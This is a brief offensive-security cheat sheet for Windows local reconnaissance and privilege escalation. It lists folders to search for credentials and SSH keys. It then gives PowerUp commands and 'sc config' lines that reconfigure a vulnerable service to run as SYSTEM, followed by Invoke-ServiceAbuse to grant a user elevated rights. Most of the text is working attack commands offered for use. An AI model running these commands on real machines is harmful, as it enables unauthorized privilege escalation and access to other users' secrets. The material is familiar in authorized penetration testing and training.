Local Reconnaissance Windows

Local Enumeration

• whoami /priv

• Files and Directories

C:\program files\

C:\program files (x86)\

C:\users\bob\document

C:\users\bob\desktop

C:\users\bob\.ssh

C:\program Files\setup\mail.ps1

C:\inetpub\wwwroot\login.aspx (If web app uses MSSQL)

• Local Session

Available tokens of other users/services

• Vulnerable Service

ipmo .\powerup.ps1

invoke-allchecks

sc qc vuln

sc config vuln start demand  //Change start type

sc config vuln obj "NT AUTHORITY\SYSTEM"  //Change owner

Invoke-serviceabuse -name 'vuln' -username 'red\alice'  //Abuse